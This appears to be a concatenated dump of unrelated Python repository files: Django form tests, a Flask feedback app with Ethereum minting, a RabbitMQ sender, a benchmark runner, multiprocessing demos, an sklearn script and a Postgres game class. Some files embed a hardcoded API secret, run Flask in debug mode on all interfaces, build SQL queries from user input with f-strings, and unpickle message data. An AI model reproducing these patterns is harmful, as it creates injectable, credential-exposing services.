self.assertEqual(form.errors[\"phone_number\"]\n [0], \"This field is required.\")\n\n def test_payment_form_street_address1_is_required(self):\n form = DrinkOrderForm({\"street_address1\": \"\"})\n self.assertFalse(form.is_valid())\n self.assertIn(\"street_address1\", form.errors.keys())\n self.assertEqual(form.errors[\"street_address1\"]\n [0], \"This field is required.\")\n\n def test_payment_form_postcode_is_required(self):\n form = DrinkOrderForm({\"postcode\": \"\"})\n self.assertFalse(form.is_valid())\n self.assertIn(\"postcode\", form.errors.keys())\n self.assertEqual(form.errors[\"postcode\"]\n [0], \"This field is required.\")\n\n def test_payment_form_country_is_required(self):\n form = DrinkOrderForm({\"country\": \"\"})\n self.assertFalse(form.is_valid())\n self.assertIn(\"country\", form.errors.keys())\n self.assertEqual(form.errors[\"country\"][0], \"This field is required.\")\n\n def test_payment_form_street_address2_is_not_required(self):\n form = DrinkOrderForm({\"full_name\": \"Test\",\n \"email\": \"Test\",\n \"phone_number\": \"Test\",\n \"street_address1\": \"Test\",\n \"street_address2\": \"\",\n \"postcode\": \"Test\",\n \"country\": \"Test\",\n })\n self.assertFalse(form.is_valid())\n\n def test_fields_are_explicit_in_form_metaclass(self):\n form = DrinkOrderForm()\n fields = (\"full_name\", \"email\", \"phone_number\",\n \"street_address1\", \"street_address2\", \"postcode\",\n 
\"country\",)\n self.assertEqual(form.Meta.fields, fields)\n","repo_name":"VioletViolaVi/Milestone-Project-4","sub_path":"payment/tests_forms.py","file_name":"tests_forms.py","file_ext":"py","file_size_in_byte":3531,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"85"} +{"seq_id":"27618495837","text":"import json\n\nwith open('./results-noise-wLDSF.json') as f:\n res = json.load(f)\n\na = \"a\"\nfor i in range(50):\n print(\"{},{},{},{},{},{},{},{}\".format(\n i+1, res[\"changeParentNodes\"][i], res[\"APAS\"][\"el\"][i], res[\"APAS\"][\"sr\"][i]*100,\n res[\"LLSF\"][\"el\"][i], res[\"LLSF\"][\"sr\"][i]*100,\n res[\"LDSF\"][\"el\"][i], res[\"LDSF\"][\"sr\"][i]*100))\n","repo_name":"uconn-cps-lab/6TiSCH-Cloud","sub_path":"6TiSCH-Cloud-Frontend/src/components/schedule/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"35248667314","text":"import os,sys\nimport re\nimport threading\n\nfrom flask import Flask, render_template, request, jsonify\nfrom pusher import Pusher\nimport json\n\nfrom profanityfilter import ProfanityFilter #pip install profanityfilter #https://github.com/areebbeigh/profanityfilter\n\nsys.path.insert(0,'../pygas')\nfrom truthpipes_eth_channel import alg_mint_rule_text\n\n\n#0v1# JC Nov 9, 2019\n\n\npf = ProfanityFilter()\n\n\n# create flask app\napp = Flask(__name__)\n\n# configure pusher object\npusher = Pusher(\n app_id='893453',\n key='7b7eba95325c46e4012a',\n secret='db4ad3419ecac13d7abf',\n cluster='us2',\n ssl=True\n)\n\nLOCAL_DIR=os.path.join(os.path.dirname(__file__), \".\")\nstorage_filename=LOCAL_DIR+\"/storage1.tsv\"\n\nBACKGROUND_MINTING=True\n\ndef background_mint(the_text):\n print (\"[debug] calling mint in background (check finalization)\")\n mint_thread=threading.Thread(target=alg_mint_rule_text,args=[the_text])\n mint_thread.start()\n return\n\ndef local_mint_text(the_text):\n global BACKGROUND_MINTING\n ## Filter before\n #** also clipped at 300\n the_text=filter_displayed(the_text)\n\n ONLY_MINT_AMAZON=True\n if ONLY_MINT_AMAZON:\n m=re.search(r'\\b(B[\\dA-Z]{5,20})',the_text)\n if m:\n amazon_asin=m.group(1)\n print (\"Minting AMAZON feedback to eth: \"+str(amazon_asin))\n if BACKGROUND_MINTING:\n background_mint(amazon_asin)\n else:\n alg_mint_rule_text(amazon_asin)\n else:\n if BACKGROUND_MINTING:\n alg_mint_rule_text(the_text)\n else:\n alg_mint_rule_text(the_text)\n return\n\ndef censor_phrase(phrase):\n global pf\n return pf.censor(phrase)\n\ndef remove_private_info(phrase):\n #scrub email\n phrase=re.sub(r'[\\w\\.-]+@[\\w\\.-]+(\\.[\\w]+)+','',phrase) #no email\n phrase=re.sub(r'[\\w\\.-]+@[\\w\\.-]+(\\.[\\w]+)+','',phrase) #no email\n \n #scrub hex\n phrase=re.sub(r'([0-9A-Fx]){30,100}','',phrase,flags=re.I)\n \n if not phrase:\n phrase=''\n\n return phrase\n\ndef filter_displayed(phrase):\n if len(re.split(r' ',phrase))<3:\n#D# print (\".. 
skipping short feedback: \"+str(phrase))\n phrase=''\n phrase=censor_phrase(phrase)\n \n #Remove email address and wallets\n phrase=remove_private_info(phrase)\n \n return phrase\n\ndef dict2storage(the_dict):\n global storage_filename\n ffp=open(storage_filename,'a',encoding='utf-8')\n ffp.write(json.dumps(the_dict))\n ffp.write(\"\\n\")\n ffp.flush()\n ffp.close()\n return\n\ndef load_dicts():\n global storage_filename\n the_dicts=[]\n ffp=open(storage_filename,'r',encoding='utf-8')\n id=-1\n for liner in ffp.readlines():\n id+=1\n dd=json.loads(liner.strip())\n dd['id']=str(id)\n dd['completed']=0\n\n# dd['value']=censor_phrase(dd['comment'])\n dd['value']=filter_displayed(dd['comment'])\n \n if dd['value'] and dd['value'] is not None:\n the_dicts+=[dd]\n ffp.close()\n# print (\">> RETURNING: \"+str(the_dicts))\n return the_dicts\n\n# index route, shows index.html view\n@app.route('/')\ndef index():\n ## Initial render\n dds=load_dicts()\n print (\"Preloaded: \"+str(dds))\n\n return render_template('index.html',init_data=dds) #\n\n# endpoint for storing todo item\n@app.route('/add-todo', methods = ['POST'])\ndef addTodo():\n #JC# data = json.loads(str(request.data)) # load JSON data from request\n data=json.loads(request.get_data().decode('utf8')) #Not data as bytes\n private_contact=data.pop('value2','')\n pusher.trigger('todo', 'item-added', data) # trigger `item-added` event on `todo` channel\n\n #print (\"Should have added: \"+str(data))\n #Should have added: {'completed': 0, 'id': 'item-1573074396448', 'value': 'me'}\n dd={}\n dd['comment']=data['value']\n# dd['contact']=private_contact\n dict2storage(dd)\n \n print (\"[debug] calling mint add todo to ethereum\")\n local_mint_text(data['value'])\n \n return jsonify(data)\n\n# endpoint for deleting todo item\n@app.route('/remove-todo/')\ndef removeTodo(item_id):\n data = {'id': item_id }\n pusher.trigger('todo', 'item-removed', data)\n return jsonify(data)\n\n# endpoint for updating todo item\n@app.route('/update-todo/', methods = ['POST'])\ndef updateTodo(item_id):\n data1=json.loads(request.get_data().decode('utf8')) #Not data as bytes\n data = {\n 'id': item_id,\n 'completed': data1.get('completed', 0)\n }\n pusher.trigger('todo', 'item-updated', data)\n return jsonify(data)\n\n# run Flask app in debug mode\napp.run(host=\"0.0.0.0\",port=80,debug=True)\n\n\n\n\n\n","repo_name":"panamantis/truthpipes","sub_path":"idea_tracker/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4677,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"5098308028","text":"import pika\nimport uuid\nimport pickle\nfrom rpc import RPC, ORDER\n\nconnection = pika.BlockingConnection(pika.ConnectionParameters(host='localhost'))\nchannel = connection.channel()\n\n# create anonymous queue\nresult = channel.queue_declare(exclusive=True)\ncallback_queue = result.method.queue\n\n\ndef callback(ch, method, properties, body):\n if method.routing_key == 'orders':\n print(\"Got my order {}\".format(pickle.load(body)))\n\n\nchannel.basic_consume(callback,\n queue=callback_queue,\n no_ack=True)\n\nchannel.basic_publish(exchange='',\n routing_key='orders',\n properties=pika.BasicProperties(reply_to=callback_queue,\n correlation_id=str(uuid.uuid1())),\n body=pickle.dumps(RPC(ORDER, {'hamburger': 2})))\nprint(\"Order 
placed\")\n\nchannel.start_consuming()\n\nconnection.close()\n","repo_name":"vascoalramos/cd","sub_path":"rabbit_mq/sender.py","file_name":"sender.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"5225636564","text":"#!/usr/bin/env python3\n#Version 1.4\nfrom __future__ import print_function\nimport sys,os,re,getopt\nfrom subprocess import *\n## Make unix pipe commands work w/o errors\nimport signal\nsignal.signal(signal.SIGPIPE, signal.SIG_DFL)\n\n# genGaussData.py ${NCLUS} ${DIM} ${VAR} ${SIZE} gauss ${FOLD} ${QSIZE}\n#gaussian-nclus=${NCLUS}_dim=${DIM}_var=${VAR}_size=${SIZE}.hdf5\n#${VGDATA}/queries/gaussian-query-1_nclus=${NCLUS}_dim=${DIM}_var=${VAR}_size=${SIZE}.hdf5\n## Define constants\ndef usage(out):\n\tprint(\"Usage: ./single_sisap.py \", file=sys.stderr)\n\nif (len(sys.argv) < 6):\n\tusage(sys.stderr)\n\tsys.exit(2)\nuseSimpleQueries = False\nnclus = int(sys.argv[-7]) # numero de clusters\ndim = int(sys.argv[-6]) # la dimension de los vectores\nvar = sys.argv[-5]; # la varianza (devstd^2)\nsize = int(sys.argv[-4])\nradius = float(sys.argv[-3])\nnQueryFiles = int(sys.argv[-2])\nindexType = sys.argv[-1]\n\ndataDir = \"/Users/parnell/data\"\nqueryPath = \"%s/queries\" %dataDir\n\ni = 1\nbaseDataName = \"gaussian_nclus=%d_dim=%d_var=%s_size=%d\" %(nclus,dim,var,size)\ndataName = \"%s.vec\" %(baseDataName)\norig_data_file = \"%s/%s\" %(dataDir,dataName)\nqueryFile = \"%s/gaussian-query-%d_nclus=%d_dim=%d_var=%s_size=%d.vec\" %(queryPath,i,nclus,dim,var,size)\n\n# orig_data_files = [\"%s/gaussian_1_5_0.8_1000000.vec\" %dataDir]\n# query_file = \"%s/gaussian_query_1_5_0.8_100.vec\" %dataDir ## our query file\n\nbprog = \"build-%s-vectors\" %indexType #specify the prog to use\nqprog = \"query-%s-vectors\" %indexType #specify the query prog to use\nrstart= radius ## radius start\nrstep= radius ## radius step\nrlimit=radius ## radius end\nntrees = [1] ## Number of trees created\nloopArray = ntrees\n# variances = [\"0.01\", \"0.1\", \"0.2\",\"0.3\",\"0.4\",\"0.5\",\"0.6\",\"0.7\",\"0.8\"]\n# sizes = [\"10000\",\"100000\",\"10000000\"]\n\nindex_num =0\nindex_num+=1\n# orig_data_file = \"%s/gaussian_1_5_0.1_%s.vec\" %(dataDir,sizes[i])\n# query_file = \"%s/gaussian_query_1_5_0.1_%s_100.vec\" %(dataDir,sizes[i]) ## our query file\n\norig_index_name=\"%s_%d_%d_%s_%d_%d_dim\" %(indexType, nclus, dim, var, size, index_num)\n\n## Other constants\nrun_sisap_prog = \"run_sisap.py\"\nsplit_prog = \"splitdata.py\"\nconvert_prog = \"convertcoords\"\norig_data_basename = os.path.basename(orig_data_file)\nrcfile = \"%s-row-column.txt\" %orig_index_name\n\norig_output_dir = \"%s_output\" %orig_index_name\nindex_dir = \"%s/indexes\" %orig_output_dir\nsplit_dir = \"%s/%s_splits\" %(dataDir,baseDataName)\n\norig_results_file = \"%s-results.txt\" %orig_index_name\nrcfile = \"%s-column.txt\" %orig_index_name\nPT_RESULT = re.compile(\"Total distances per query: ([^ ]+)$\")\nPT_BEGIN_FASTA = re.compile(\"^>\")\n\n## make the output directory if it doesnt exist\nif not os.path.exists(orig_output_dir):\n os.makedirs(orig_output_dir)\n\n## Find datatype\ndatatype = \"vectors\"\nfor line in open(orig_data_file):\n if PT_BEGIN_FASTA.match(line): datatype = \"fasta\"\n break\nprint( \"building index '%s' datatype='%s'\" %(orig_data_file, datatype))\n\n## Write the number of trees\nrcf = open(\"%s/%s\" %(orig_output_dir,rcfile),\"w\")\nfor nt in loopArray:\n rcf.write(\"\\t%d\" 
%nt)\nrcf.write(\"\\n\")\nrcf.close()\n\n\n## for each of the specified trees\nfor nt in loopArray:\n nt = int(nt)\n print( \"############################## %d\" %nt)\n ### Create our data and index directories\n psplit_dir = \"%s_%d\" %(split_dir,nt)\n pindex_dir = \"%s_%d\" %(index_dir,nt)\n if not os.path.exists(psplit_dir):\n os.makedirs(psplit_dir)\n if not os.path.exists(pindex_dir):\n os.makedirs(pindex_dir)\n\n ### Split data into nt parts\n cmdstr = \"%s -o %s -k %d %s\" %(split_prog,psplit_dir,nt,orig_data_file)\n print( cmdstr)\n retcode = call(cmdstr, shell=True)\n poutput_loc = \"%s/%d_%s\" %(orig_output_dir,nt,orig_index_name)\n\n ### Data must now be converted to Sisap format\n for i in range(0,nt):\n dt = \"--data-type=string\"\n psplit_name = \"split_%d_%s\" %(i,orig_data_basename)\n if datatype == \"vectors\":\n dt = \"--data-type=vector\"\n psplit_bin = \"%s.bin\" %(psplit_name)\n pdata_file = \"%s/%s\" %(psplit_dir,psplit_bin)\n cmdstr = \"%s '%s/%s' '%s'\" %(convert_prog,psplit_dir,psplit_name, pdata_file)\n if i==0 or i==nt-1: print( \">%s\" %cmdstr)\n if not os.path.exists(pdata_file):\n retcode = call(cmdstr, shell=True) \n elif i==0 or i==nt-1:\n print(\"convertcoords: skipped because file already exists\") \n else :\n pdata_file = \"%s/%s\" %(psplit_dir, psplit_name)\n \n \n ### Now we can run sisap.py on each of the splits\n pindex_name=\"%d_%s\" %(i,orig_index_name)\n pquery_file = queryFile\n sim = \"--simple\" if useSimpleQueries else \"\"\n cmdstr = \"%s %s --index-name=%s --data-file=%s --index-dir=%s --query-file=%s --sisap-build=%s --sisap-query=%s --output-loc=%s --rstart=%f --rstep=%f --rlimit=%f %s\" \\\n %(run_sisap_prog,dt, pindex_name,pdata_file,pindex_dir,queryFile,bprog,qprog,poutput_loc, rstart, rstep, rlimit, sim)\n if i==0 or i==nt-1: print (\">%s\" %cmdstr)\n retcode = call(cmdstr, shell=True) \n \n \n\n","repo_name":"parnell/sisap_tools","sub_path":"single_sisap.py","file_name":"single_sisap.py","file_ext":"py","file_size_in_byte":5200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"39800548124","text":"from multiprocessing import Lock, Process, Queue, current_process\nimport time\nimport queue # imported for using queue.Empty exception\n\n\nfrom SupportPkg.screenshot import *\n#https://www.journaldev.com/15631/python-multiprocessing-example\n\nwork = ([\"A\", 5], [\"B\", 2], [\"C\", 1], [\"D\", 3],[\"E\", 5], [\"F\", 2], [\"G\", 1], [\"H\", 3])\n\n\ndef work_log(work_data):\n print(\" Process %s waiting %s seconds\" % (work_data[0], work_data[1]))\n time.sleep(int(work_data[1]))\n print(\" Process %s Finished.\" % work_data[0])\n\n\ndef pool_handler():\n p = Pool(2)\n p.map(work_log, work)\n\n\ndef print_func(continent='Asia'):\n if(continent=='1'):\n print('The name of continent is : ', continent)\n ScreenshotSaveOption()\n else:\n print('The name of continent is : ', continent)\n\ndef do_job(tasks_to_accomplish, tasks_that_are_done):\n while True:\n try:\n '''\n try to get task from the queue. get_nowait() function will \n raise queue.Empty exception if the queue is empty. 
\n queue(False) function would do the same task also.\n '''\n task = tasks_to_accomplish.get_nowait()\n except queue.Empty:\n\n break\n else:\n '''\n if no exception has been raised, add the task completion \n message to task_that_are_done queue\n '''\n print(task)\n tasks_that_are_done.put(task + ' is done by ' + current_process().name)\n time.sleep(.5)\n return True\n\n\ndef Queuemain():\n number_of_task = 10\n number_of_processes = 4\n tasks_to_accomplish = Queue()\n tasks_that_are_done = Queue()\n processes = []\n\n for i in range(number_of_task):\n tasks_to_accomplish.put(\"Task no \" + str(i))\n\n # creating processes\n for w in range(number_of_processes):\n p = Process(target=do_job, args=(tasks_to_accomplish, tasks_that_are_done))\n processes.append(p)\n p.start()\n\n # completing process\n for p in processes:\n p.join()\n\n # print the output\n while not tasks_that_are_done.empty():\n print(tasks_that_are_done.get())\n\n return True\n\n\nif __name__ == \"__main__\": # confirms that the code is under main function\n names = ['America', 'Europe', 'Africa']\n procs = []\n #proc = Process(target=print_func) # instantiating without any argument\n #procs.append(proc)\n #proc.start()\n\n # instantiating process with arguments\n #for name in names:\n # print(name)\n while True:\n name = input()\n if(name == 'bye'):\n break\n proc = Process(target=print_func, args=(name,))\n procs.append(proc)\n proc.start()\n\n # complete the processes\n #for proc in procs:\n # proc.join()","repo_name":"arunkumar-js25/Assistant-Chatbot","sub_path":"SupportPkg/TryOuts/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"40026416826","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.compose import ColumnTransformer\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn import svm\nfrom sklearn.metrics import confusion_matrix\n\ndf = pd.read_csv(\"dataset.csv\")\n#--------------------------------------------------------------------------------\n# Karim functions\n#--------------------------------------------------------------------------------\n\nprint(\"---------------------------------------------------------------\")\nprint(\"-----------------------Date-------------------------------\")\nprint(df)\n\n# ----------------------------- Clean first ------------------------------#\ndef mean() :\n df1 = pd.read_csv(\"data.csv\")\n imputer = SimpleImputer(missing_values=np.nan, strategy='mean')\n df1.iloc[:, 1:5] = pd.DataFrame(imputer.fit_transform(df1.iloc[:, 1:5]))\n imp = SimpleImputer(missing_values=np.nan, strategy='constant',fill_value=\"empty\")\n df1.iloc[:,0:5]= pd.DataFrame(imp.fit_transform(df1.iloc[:,0:5]))\n print('-------------Data After Imputer (mean)-------------')\n print(df1)\n\ndef median() :\n df2 = pd.read_csv(\"data.csv\")\n imputer = SimpleImputer(missing_values=np.nan, strategy='median')\n df2.iloc[:, 1:5] = pd.DataFrame(imputer.fit_transform(df2.iloc[:, 1:5]))\n imp = SimpleImputer(missing_values=np.nan, strategy='constant', fill_value=\"empty\")\n df2.iloc[:,0:5] = pd.DataFrame(imp.fit_transform(df2.iloc[:,0:5]))\n print('-------------Data After Imputer (median)-------------')\n print(df2)\n\ndef most_frequent() :\n # Imputer 
(most_frequent)\n df6 = pd.read_csv(\"data.csv\")\n imputer = SimpleImputer(missing_values=np.nan, strategy='most_frequent')\n df6.iloc[:, 1:5] = pd.DataFrame(imputer.fit_transform(df6.iloc[:, 1:5]))\n imp = SimpleImputer(missing_values=np.nan, strategy='constant', fill_value=\"empty\")\n df6.iloc[:,0:5] = pd.DataFrame(imp.fit_transform(df6.iloc[:,0:5]))\n print('-------------Data After Imputer (most_frequent)-------------')\n print(df6)\n\ndef constant() :\n df7 = pd.read_csv(\"data.csv\")\n imputer = SimpleImputer(missing_values=np.nan, strategy='constant',fill_value=\"empty\")\n df7.iloc[:,0:5] = pd.DataFrame(imputer.fit_transform(df7.iloc[:,0:5]))\n print('-------------Data After Imputer (constant)-------------')\n print(df7)\n\ndef one_Hot_Decoder() :\n df0 = pd.read_csv(\"data.csv\")\n ct = ColumnTransformer([('encoder', OneHotEncoder(handle_unknown='ignore'), [int(0)])], remainder='passthrough')\n df0 = pd.DataFrame(ct.fit_transform(df0))\n print('-------------Data After one Hot Decoder-------------')\n print(df0)\n\ndef LableDecoder() :\n df3 = pd.read_csv(\"data.csv\")\n le = LabelEncoder()\n df3.iloc[:,-1] = pd.DataFrame( le.fit_transform(df3.iloc[:, -1]))\n print('-------------Data After LableDecoder-------------')\n print(df3)\n\n\n\ndf = pd.read_csv(\"dataset.csv\")\nimputer = SimpleImputer(missing_values=np.nan, strategy='mean')\ndf.iloc[:, 1:] = pd.DataFrame(imputer.fit_transform(df.iloc[:, 1:]))\n\nle = LabelEncoder()\ndf.iloc[:, -1] = pd.DataFrame(le.fit_transform(df.iloc[:, -1]))\nct = ColumnTransformer([('encoder', OneHotEncoder(handle_unknown='ignore'), [int(0)])], remainder='passthrough')\ndf = pd.DataFrame(ct.fit_transform(df))\nprint('-------------Data After pre_processing-------------')\nprint(df )\n\n#--------------------------------------------------------------------------------\n# Fathy functions (linear & knn)\n#--------------------------------------------------------------------------------\n\n\ndata = pd.read_csv(\"dataset.csv\")\nX = data.iloc[:, :-1].values\nprint(x)\ny = data.iloc[:, -1].values\nprint(y)\ntrain = 0.7\nx_train,x_test,y_train,y_test= train_test_split(X,y,train_size=train)\nmodel = KNeighborsClassifier(n_neighbors=3)\nmodel.fit(x_train,y_train)\nprediction = model.predict(x_test)\nprint (prediction)\n\n#--------------------------------------------------------------------------------\n# Fatma functions (SVM)\n#--------------------------------------------------------------------------------\ndef holdout() :\n data=pd.read_csv('dataset.csv')\n x = data.iloc[:, :-1]\n print(x.shape)\n y = data.iloc[:, -1]\n print(y.shape)\n x_train, x_test, y_train, y_test = train_test_split(x, y, train_size=0.7)\n # لكن لو اختار ال kfold ينفذ دا\n from sklearn.model_selection import KFold\n k = 5\n kfold = KFold(n_splits=k, random_state=None, shuffle=True)\n for train_index, test_index in kfold.split(x):\n x_train, x_test = x.iloc[train_index, :], x.iloc[test_index, :]\n print(x_train)\n y_train, y_test = y[train_index], y[test_index]\n break\n # rba ,linear هيبقى قيه اتنين راديو باتن واحد\n # لو اختار rba\n # Create SVM classifier object\n classifier = svm.SVC(kernel='rbf')\n # Train SVM classifier on training data\n classifier.fit(x_train, y_train)\n y_pred = classifier.predict(x_test)\n matrix = confusion_matrix(y_test, y_pred)\n print(matrix)\n # accuracy score\n from sklearn.metrics import accuracy_score\n acc = accuracy_score(y_test, y_pred)\n print(\"accuracy\", acc) # دا هيظهر ف شكل label فيه كلمه accuracy و\n # text=accفيه قيمه ال\n # precisio\n from 
sklearn.metrics import precision_score\n pre = precision_score(y_test, y_pred, average='micro') # دا هيظهر ف شكل label فيه كلمه precision و\n print(\"precision\", pre) # text=preفيه قيمه ال\n # recall\n from sklearn.metrics import recall_score\n rec = recall_score(y_test, y_pred, average='micro')\n print(\"recall\", rec) # زى اللى فوق\n # f1-measure\n from sklearn.metrics import f1_score\n f1 = f1_score(y_test, y_pred, average='micro')\n print(\"measure\", f1)\n#\ndef k_fold() :\n # linearلكن لو اختار\n data = pd.read_csv('dataset.csv')\n x = data.iloc[:, :-1]\n y = data.iloc[:, -1]\n from sklearn.model_selection import train_test_split\n x_train, x_test, y_train, y_test = train_test_split(x, y, train_size=0.7)\n # Create SVM classifier object\n classifier = svm.SVC(kernel='linear')\n # Train SVM classifier on training data\n classifier.fit(x_train, y_train)\n y_pred = classifier.predict(x_test)\n from sklearn.metrics import confusion_matrix\n matrix = confusion_matrix(y_test, y_pred)\n print(matrix)\n # accuracy score\n from sklearn.metrics import accuracy_score\n acc = accuracy_score(y_test, y_pred)\n print(\"accuracy\", acc)\n # precision\n from sklearn.metrics import precision_score\n pre = precision_score(y_test, y_pred, average='micro')\n print(\"precision\", pre)\n # recall\n from sklearn.metrics import recall_score\n rec = recall_score(y_test, y_pred, average='micro')\n print(\"recall\", rec)\n # f1-measure\n from sklearn.metrics import f1_score\n f1 = f1_score(y_test, y_pred, average='micro')\n print(\"measure\", f1)\n\n\n# linearRegression()\n# knn()\n# holdout()\n# k_fold()\n","repo_name":"karimAdel2002/pre-processing","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"1967083472","text":"import psycopg2 as ps\r\nfrom config import DB_URI\r\nimport random\r\nfrom datetime import date\r\nimport random\r\nimport asyncio\r\n\r\nclass Player():\r\n def __init__(self, id, uid, ban, nickname, race, health, maxhealth, level, xp, maxxp, gold, silver, copper, dater, donate, manna, maxmanna, action, keyb):\r\n self.id = id\r\n self.uid = uid\r\n self.ban = ban\r\n self.nickname = nickname\r\n self.race = race\r\n self.health = health\r\n self.maxhealth = maxhealth\r\n self.level = level\r\n self.xp = xp\r\n self.maxxp = maxxp\r\n self.gold = gold\r\n self.silver = silver\r\n self.copper = copper\r\n self.dater = dater\r\n self.donate = donate\r\n self.manna = manna\r\n self.maxmanna = maxmanna\r\n self.action = action\r\n self.keyb = keyb\r\n\r\n @staticmethod\r\n def create_profile(id, nick):\r\n db = ps.connect(DB_URI, sslmode=\"require\")\r\n cur = db.cursor()\r\n cur.execute(\"SELECT uids FROM ids\")\r\n ids = cur.fetchone()\r\n x = random.randint(0, 10)\r\n if x == 3:\r\n racer = \"Демон\"\r\n if x == 6:\r\n racer = \"Эльф\"\r\n if x == 9:\r\n racer = \"Ангел\"\r\n else:\r\n racer = \"Человек\"\r\n daterr = date.today()\r\n if racer == \"Человек\":\r\n cur.execute(\"INSERT INTO users VALUES(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\", (id, ids[0], 0, nick, racer, 250, 250, 1, 0, 8, 0, 0, 0, daterr, \"Нет\", 0, 1000, \"main\", 1))\r\n if racer == \"Демон\":\r\n cur.execute(\"INSERT INTO users VALUES(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\", (id, ids[0], 0, nick, racer, 1000, 1000, 1, 0, 8, 0, 0, 0, daterr, \"Нет\", 0, 1000, \"main\", 1))\r\n if racer == \"Ангел\":\r\n cur.execute(\"INSERT INTO users 
VALUES(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\", (id, ids[0], 0, nick, racer, 750, 750, 1, 0, 8, 0, 0, 0, daterr, \"Нет\", 0, 1000, \"main\", 1))\r\n if racer == \"Эльф\":\r\n cur.execute(\"INSERT INTO users VALUES(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\", (id, ids[0], 0, nick, racer, 500, 500, 1, 0, 8, 0, 0, 0, daterr, \"Нет\", 0, 1000, \"main\", 1))\r\n cur.execute(\"UPDATE ids SET uids=uids+1\")\r\n db.commit()\r\n return racer\r\n\r\n @staticmethod\r\n def get_profile(id):\r\n db = ps.connect(DB_URI, sslmode=\"require\")\r\n cur = db.cursor()\r\n cur.execute(f\"SELECT gold, silver, copper, xp, maxxp, health, maxhealth, level FROM users WHERE id='{id}'\")\r\n g = cur.fetchone()\r\n s = round(g[1], 1)\r\n cur.execute(f\"UPDATE users SET silver='{s}' WHERE id='{id}'\")\r\n if g[3] >= g[4]:\r\n cur.execute(f\"UPDATE users SET xp=0 WHERE id='{id}'\")\r\n cur.execute(f\"UPDATE users SET maxxp=maxxp*2 WHERE id='{id}'\")\r\n cur.execute(f\"UPDATE users SET level=level+1 WHERE id='{id}'\")\r\n cur.execute(f\"UPDATE users SET maxhealth=maxhealth+10 WHERE id='{id}'\")\r\n cop = 200 * g[7]\r\n cur.execute(f\"UPDATE users SET copper=copper+'{cop}' WHERE id='{id}'\")\r\n if g[5] > g[6]:\r\n cur.execute(f\"UPDATE users SET health=maxhealth WHERE id='{id}'\")\r\n db.commit()\r\n cur.execute(f\"SELECT * FROM users WHERE id='{id}'\")\r\n i = cur.fetchone()\r\n if i == None:\r\n return False\r\n if i[2] == 1:\r\n return False\r\n if i != None:\r\n return Player(i[0], i[1], i[2], i[3], i[4], i[5], i[6], i[7], i[8], i[9], i[10], i[11], i[12], i[13], i[14], i[15], i[16], i[17], i[18])\r\n\r\n def set_action(id, act):\r\n db = ps.connect(DB_URI, sslmode=\"require\")\r\n cur = db.cursor()\r\n cur.execute(f\"UPDATE users SET action='{act}' WHERE uid='{id}'\")\r\n db.commit()\r\n\r\n def keyb(id, ke):\r\n db = ps.connect(DB_URI, sslmode=\"require\")\r\n cur = db.cursor()\r\n cur.execute(f\"UPDATE users SET keyb='{ke}' WHERE uid='{id}'\")\r\n db.commit()\r\n\r\n def set_nick(id, nick):\r\n db = ps.connect(DB_URI, sslmode=\"require\")\r\n cur = db.cursor()\r\n cur.execute(f\"UPDATE users SET nickname='{nick}' WHERE uid='{id}'\")\r\n db.commit()\r\n\r\n def silver_gold(id, numb):\r\n db = ps.connect(DB_URI, sslmode=\"require\")\r\n cur = db.cursor()\r\n cur.execute(f\"SELECT silver FROM users WHERE uid='{id}'\")\r\n i = cur.fetchone()\r\n if i[0] >= float(numb):\r\n x = float(numb)/100\r\n cur.execute(f\"UPDATE users SET gold=gold+'{x}' WHERE uid='{id}'\")\r\n cur.execute(f\"UPDATE users SET silver=silver-'{numb}' WHERE uid='{id}'\")\r\n db.commit()\r\n if i[0] < float(numb):\r\n return False\r\n\r\n def bronze_silver(id, numb):\r\n db = ps.connect(DB_URI, sslmode=\"require\")\r\n cur = db.cursor()\r\n cur.execute(f\"SELECT copper FROM users WHERE uid='{id}'\")\r\n i = cur.fetchone()\r\n if i[0] >= float(numb):\r\n x = float(numb)/100\r\n cur.execute(f\"UPDATE users SET silver=silver+'{x}' WHERE uid='{id}'\")\r\n cur.execute(f\"UPDATE users SET copper=copper-'{numb}' WHERE uid='{id}'\")\r\n db.commit()\r\n if i[0] < float(numb):\r\n return False\r\n\r\n def job(id, jid):\r\n db = ps.connect(DB_URI, sslmode=\"require\")\r\n cur = db.cursor()\r\n if jid == 1:\r\n x = random.randint(0,1)\r\n m = random.randint(1,3)\r\n cur.execute(f\"UPDATE users SET xp=xp+'{x}' WHERE uid='{id}'\")\r\n cur.execute(f\"UPDATE users SET copper=copper+'{m}' WHERE uid='{id}'\")\r\n db.commit()\r\n return x, m\r\n if jid == 2:\r\n x = random.randint(0,2)\r\n m = random.randint(1,5)\r\n 
